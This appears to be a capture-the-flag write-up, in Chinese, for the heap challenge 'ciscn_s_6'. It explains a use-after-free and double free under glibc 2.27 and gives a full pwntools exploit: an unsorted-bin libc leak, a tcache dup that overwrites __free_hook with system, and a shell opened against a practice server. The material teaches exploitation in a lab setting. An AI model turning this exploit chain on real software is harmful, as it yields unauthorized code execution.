ciscn_s_6
惯例我们先来checksec一下
保护全开（RELRO、Canary、NX、PIE 均开启）的 64 位程序——这意味着 GOT 不可写、代码和 libc 地址都需要先泄露，所以后面劫持的是 __free_hook 而不是 GOT 表项。放进 ida64 里看看
非常标准的菜单题
漏洞点出现在 call 函数（也就是此类题目里通常的 delete 函数）中：它只将 chunk free 掉而未将指针置零，于是同一个 index 既可以在 free 后再次 show（UAF 读），也可以被重复 free（double free）。
需要注意的是此题运行在 Ubuntu 18.04（glibc 2.27）环境下，因此存在 tcache。这并不构成障碍：2.27 的 tcache 还没有 2.29 才加入的 key 字段 double-free 检查，而程序又未将指针归零，所以对同一个 index 连续执行 7 次 delete 就能把对应大小的 tcache bin 填满（容量正好是 7），之后再 free 一个同大小的 chunk 就会绕过 tcache 进入 unsorted bin。
那么我们的思路就很明了了：首先利用 unsorted bin leak——进入 unsorted bin 的 chunk 其 fd/bk 指向 main_arena 里的 bin 头——通过 show 读出这个指针，减去固定偏移即可得到 libc 基址。
然后我们利用 tcache 的 double free（tcache dup）：把一个 0x20 大小的 chunk free 两次，再申请回来时把它的 fd（tcache next 指针）改写为 __free_hook，这样第三次 malloc 就会返回 __free_hook 所在位置，我们把它篡改为 system 的地址；最后 free 掉事先申请好的、内容为 "/bin/sh" 的 chunk，就等价于执行 system("/bin/sh")，自此我们成功获取了 shell。
exp
from pwn import *
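# Target selection: the remote instance is the default; run the script as
# `python exp.py LOCAL` (pwntools' magic `args`) to debug against the local
# binary instead of editing/commenting lines.
if args.LOCAL:
    io = process('./ciscn_s_6')
else:
    io = remote('node4.buuoj.cn', 26447)
elf = ELF("./ciscn_s_6")
# Must be the libc the target actually runs (Ubuntu 18.04 / glibc 2.27):
# every offset used later (__malloc_hook, __free_hook, system and the 0x70
# gap to the unsorted-bin head) is read from this file.
libc = ELF('./libc-2.27.so')
# Dump all traffic; useful while developing, noisy once the exploit works.
context.log_level = 'debug'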
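def add(size, content, call):
    """Menu option 1: create an entry whose name buffer is `size` bytes.

    `content` is written with send() (no trailing newline) so raw bytes such
    as a p64() pointer arrive untouched; `call` is sent as a line.  Both may
    be str or bytes; everything is converted to bytes here so the script does
    not depend on pwntools' implicit str encoding.
    """
    io.recvuntil(b"choice:")
    io.sendline(b"1")
    io.recvuntil(b"Please input the size of compary's name\n")
    io.sendline(str(size).encode())
    io.recvuntil(b"please input name:\n")
    io.send(content if isinstance(content, bytes) else content.encode())
    io.recvuntil(b"please input compary call:\n")
    io.sendline(call if isinstance(call, bytes) else call.encode())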
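def show(idx):
    """Menu option 2: print entry `idx`.

    The program prints the name buffer even after it was freed (the pointer
    is never NULLed), which is what turns this into the UAF read used for
    the unsorted-bin leak.  The caller reads the output itself.
    """
    io.recvuntil(b"choice:")
    io.sendline(b"2")
    io.recvuntil(b"Please input the index:")
    io.sendline(str(idx).encode())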
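def delete(idx):
    """Menu option 3: free entry `idx`.

    The program frees the chunk but keeps the dangling pointer, so calling
    this repeatedly with the same `idx` is a double free (no tcache key
    check in glibc 2.27).
    """
    io.recvuntil(b"choice:")
    io.sendline(b"3")
    io.recvuntil(b"Please input the index:")
    io.sendline(str(idx).encode())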
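# --- stage 0: heap layout ---------------------------------------------------
# chunks 0/1: 0x80-byte requests (0x90 chunks) used for the unsorted-bin leak;
# chunks 2/3: 0x20-byte requests, chunk 3 holds the "/bin/sh" that will be
# handed to system() through __free_hook.  chunk 3 is fresh heap memory, so
# the byte after "/bin/sh" is relied upon to already be 0.
add(0x80, b"aaaa", b"bbbb")    # chunk 0
add(0x80, b"cccc", b"dddd")    # chunk 1
add(0x20, b"eeee", b"ffff")    # chunk 2
add(0x20, b"/bin/sh", b"hhhh") # chunk 3

# --- stage 1: fill the 0x90 tcache bin --------------------------------------
# glibc 2.27 has no tcache double-free detection (the `key` field arrived in
# 2.29) and the program never NULLs the freed pointer, so freeing index 0
# seven times puts the same chunk into the bin seven times -- its capacity.
# Any further 0x90 free now bypasses tcache.
for _ in range(7):
    delete(0)

# --- stage 2: unsorted-bin leak -----------------------------------------------
# chunk 1 is not adjacent to top (chunk 2 sits behind it), so it lands in the
# unsorted bin with fd/bk pointing at the bin head inside main_arena.
delete(1)
show(1)
unsortedbin = u64(io.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
log.info("unsorted-bin fd leak: %#x", unsortedbin)
# 64-bit glibc 2.27: the unsorted-bin head is main_arena+0x60 and main_arena
# starts 0x10 after __malloc_hook, hence the 0x70.
libcbase = unsortedbin - 0x70 - libc.sym['__malloc_hook']
# A libc base that is not page-aligned means the leak or the libc file is
# wrong; stop here rather than writing garbage into __free_hook.
if libcbase & 0xfff:
    log.error("libc base %#x is not page-aligned -- wrong libc or bad leak", libcbase)
system = libcbase + libc.sym['system']
free_hook = libcbase + libc.sym['__free_hook']
log.success("libc base %#x  system %#x  __free_hook %#x", libcbase, system, free_hook)
# gdb.attach(io)
# pause()

# --- stage 3: tcache dup -> __free_hook -------------------------------------
# Double-free chunk 2 into the 0x30 tcache bin (list: 2 -> 2).  The first
# malloc returns chunk 2 and overwrites its fd (tcache next) with __free_hook;
# the second malloc returns chunk 2 again; the third returns __free_hook
# itself, where we write the address of system.
delete(2)
delete(2)
add(0x20, p64(free_hook), b"bbb")
add(0x20, b"c", b"b")
add(0x20, p64(system), b"c")

# --- stage 4: free("/bin/sh") is now system("/bin/sh") ----------------------
delete(3)
io.interactive()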